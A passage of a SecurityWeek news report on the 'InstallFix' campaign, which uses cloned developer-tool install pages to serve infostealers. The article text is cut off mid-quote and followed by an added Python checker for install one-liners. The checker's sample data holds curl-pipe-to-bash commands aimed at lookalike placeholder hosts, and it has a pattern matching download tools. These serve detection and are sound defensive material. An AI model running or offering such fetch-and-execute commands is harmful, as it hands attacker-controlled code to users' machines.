
Cloned AI Tool Sites Distribute Malware in ‘InstallFix’ Campaign


A new variant of the ClickFix attack relies on cloned webpages for popular development tools to distribute information-stealing malware, Push Security reports.

As part of the campaign, dubbed InstallFix, threat actors rely on malvertising to lure victims to legitimate-looking malicious installation pages on which install commands have been replaced with rogue ones.

One variant of the attack abuses users’ interest in Anthropic’s Claude Code CLI tool, using malicious advertisements distributed exclusively through Google Ads, increasing the visibility of the cloned page via sponsored search results.

The cloned page is a near-pixel-perfect replica of the legitimate one. The install one-liner on it, however, points to an attacker-controlled server that distributes an infostealer, instead of fetching the install script for Claude Code.

“Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real ...
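The check that quote says almost nobody performs can be scripted. The following is an added example, not code from Push Security or the original article: it extracts every URL from an install one-liner and compares the real host against an exact allowlist. The host `tool.example`, the sample commands and the function name `audit_one_liner` are constructed placeholders.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts copied from the vendor's own documentation (reached by a
# typed URL or bookmark, not a sponsored result). "tool.example" is a placeholder.
PINNED_HOSTS = {"tool.example"}

URL_RE = re.compile(r"""https?://[^\s'"|;&<>()`]+""", re.IGNORECASE)
FETCH_RE = re.compile(r"\b(curl|wget|irm|iwr)\b", re.IGNORECASE)

def audit_one_liner(command, pinned=PINNED_HOSTS):
    """Return findings for an install one-liner; an empty list means every
    URL it fetches is HTTPS and served from an exactly pinned host."""
    findings = []
    urls = URL_RE.findall(command)
    if FETCH_RE.search(command) and not urls:
        findings.append("download command without a literal URL to inspect")
    for url in urls:
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower().rstrip(".")
        except ValueError:
            findings.append(f"{url}: unparseable URL")
            continue
        if parts.scheme.lower() != "https":
            findings.append(f"{url}: not HTTPS")
        if parts.username is not None:
            findings.append(f"{url}: text before '@' is userinfo, real host is {host}")
        if not host.isascii() or "xn--" in host:
            findings.append(f"{url}: internationalized host name, check for homoglyphs")
        if host not in pinned:  # exact match: suffix and prefix lookalikes fail
            findings.append(f"{url}: host {host} is not pinned")
    return findings

# Constructed sample commands (all hosts are placeholders).
SAMPLES = {
    "vendor": "curl -fsSL https://tool.example/install.sh | bash",
    "lookalike": "curl -fsSL https://tool-example.install.test/install.sh | bash",
    "userinfo": "curl -fsSL https://tool.example@downloads.test/install.sh | bash",
    "suffix": "curl -fsSL http://tool.example.cdn.test/i.sh | sh",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, audit_one_liner(cmd) or "ok")
```

A clean result only confirms where the script is fetched from; the pinned list is only as trustworthy as the source it was copied from.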


Copyright of this story solely belongs to SecurityWeek.